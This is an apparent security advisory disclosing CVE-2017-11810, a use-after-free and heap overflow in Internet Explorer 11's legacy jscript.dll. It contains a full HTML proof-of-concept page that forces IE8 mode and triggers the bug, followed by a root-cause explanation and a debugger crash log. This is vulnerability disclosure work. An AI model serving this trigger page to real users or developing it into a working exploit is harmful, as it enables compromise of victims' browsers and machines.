Microsoft Internet Explorer 11 jscript!JsErrorToString Use-After-Free

2017.11.10
Credit: ifratric
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 7.6/10
Impact Subscore: 10/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Microsoft IE11: use-after-free in jscript!JsErrorToString CVE-2017-11810 There is a use-after-free in jscript.dll library that can be exploited in IE11. jscript.dll is an old JavaScript library that was used in IE 8 and back. However, IE11 can still load it if put into IE8 compatibility mode and if there is a script tag that can only be understood by the older library (specifically, a script tag with language="Jscript.Encode" attribute will do the trick). PoC: ========================================= <!-- saved from url=(0014)about:internet --> <html> <head> <meta http-equiv="X-UA-Compatible" content="IE=8"></meta> </head> <body> <script language="Jscript.Encode"> var e = new Error(); var o = {toString:function() { //alert('in toString'); e.name = 1; CollectGarbage(); //reallocate for(var i=0;i<100;i++) { e.name = {}; } return 'b'; }}; e.name = Array(1000).join('a'); e.message = o; //alert('calling JsErrorToString'); var result = e.toString(); //alert('boom'); alert(result); </script> </body> </html> ========================================= This is a use-after-free in jscript!JsErrorToString that can lead to a heap overflow. (The PoC above crashes in memcpy when attempting to copy a large amount of data). When JsErrorToString runs, it tries to concatenate anamea and amessagea properties of an Error object into an AString object (AString is a string type that is implemented as a list of simpler string parts). First the function converts both anamea and amessagea properties to strings using the ConvertToString function, however the second call to ConvertToString can trigger a callback (via toString) and delete the anamea string. Later, when AString is converted to the BString in AString::ConvertToBSTR, the size of the result BString could be calculated incorrectly which can lead to a heap overflow. Debug log: ========================================= (10b8.1364): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000003 ebx=00000006 ecx=dcbabbb8 edx=00000003 esi=e6e8bb7f edi=e900fb9b eip=751c9a6c esp=09dfbdfc ebp=09dfbe04 iopl=0 nv up ei ng nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010286 msvcrt!memcpy+0x270: 751c9a6c 8a4603 mov al,byte ptr [esi+3] ds:002b:e6e8bb82=?? 0:008> k # ChildEBP RetAddr 00 09dfbe04 7013c367 msvcrt!memcpy+0x270 01 09dfbe28 7013c3df jscript!AString::ConvertToBSTR+0x86 02 09dfbe30 7013eeff jscript!VAR::ConvertASTRtoBSTR+0x13 03 09dfbe6c 7013af84 jscript!InvokeDispatch+0x424 04 09dfbf38 7013aefe jscript!InvokeDispatchEx+0x7a 05 09dfbf68 701244a7 jscript!VAR::InvokeByDispID+0x90 06 09dfc360 701248ff jscript!CScriptRuntime::Run+0x12b9 07 09dfc45c 70124783 jscript!ScrFncObj::CallWithFrameOnStack+0x15f 08 09dfc4b4 70124cc3 jscript!ScrFncObj::Call+0x7b 09 09dfc558 70133797 jscript!CSession::Execute+0x23d 0a 09dfc5a0 70135353 jscript!COleScript::ExecutePendingScripts+0x16b 0b 09dfc61c 70135139 jscript!COleScript::ParseScriptTextCore+0x206 0c 09dfc648 6bcecf1c jscript!COleScript::ParseScriptText+0x29 0d 09dfc680 6bced6da MSHTML!CActiveScriptHolder::ParseScriptText+0x51 0e 09dfc6f0 6ba5f185 MSHTML!CScriptCollection::ParseScriptText+0x1c6 0f 09dfc7dc 6ba5ecf7 MSHTML!CScriptData::CommitCode+0x31e 10 09dfc85c 6ba5f8bd MSHTML!CScriptData::Execute+0x232 11 09dfc87c 6bced030 MSHTML!CHtmScriptParseCtx::Execute+0xed 12 09dfc8d0 6bcf8265 MSHTML!CHtmParseBase::Execute+0x201 13 09dfc8ec 6b76388c MSHTML!CHtmPost::Broadcast+0x18e 14 09dfca24 6b894a9d MSHTML!CHtmPost::Exec+0x617 15 09dfca44 6b894a03 MSHTML!CHtmPost::Run+0x3d 16 09dfca60 6b89c1e5 MSHTML!PostManExecute+0x61 17 09dfca74 6b89d578 MSHTML!PostManResume+0x7b 18 09dfcaa4 6b796dbc MSHTML!CHtmPost::OnDwnChanCallback+0x38 19 09dfcabc 6b6d5b90 MSHTML!CDwnChan::OnMethodCall+0x2f 1a 09dfcb0c 6b6d577a MSHTML!GlobalWndOnMethodCall+0x16c 1b 09dfcb60 760f62fa MSHTML!GlobalWndProc+0x103 1c 09dfcb8c 760f6d3a user32!InternalCallWinProc+0x23 1d 09dfcc04 760f77c4 user32!UserCallWinProcCheckWow+0x109 1e 09dfcc64 760f788a user32!DispatchMessageWorker+0x3b5 1f 09dfcc74 6cada8ec user32!DispatchMessageW+0xf 20 09dffe40 6cb056d8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464 21 09dfff00 76ab2f5c IEFRAME!LCIETab_ThreadProc+0x3e7 22 09dfff18 74693a31 iertutil!CMemBlockRegistrar::_LoadProcs+0x67 23 09dfff50 7667336a IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94 24 09dfff5c 77379902 kernel32!BaseThreadInitThunk+0xe 25 09dfff9c 773798d5 ntdll!__RtlUserThreadStart+0x70 26 09dfffb4 00000000 ntdll!_RtlUserThreadStart+0x1b ========================================= This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Found by: ifratric


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top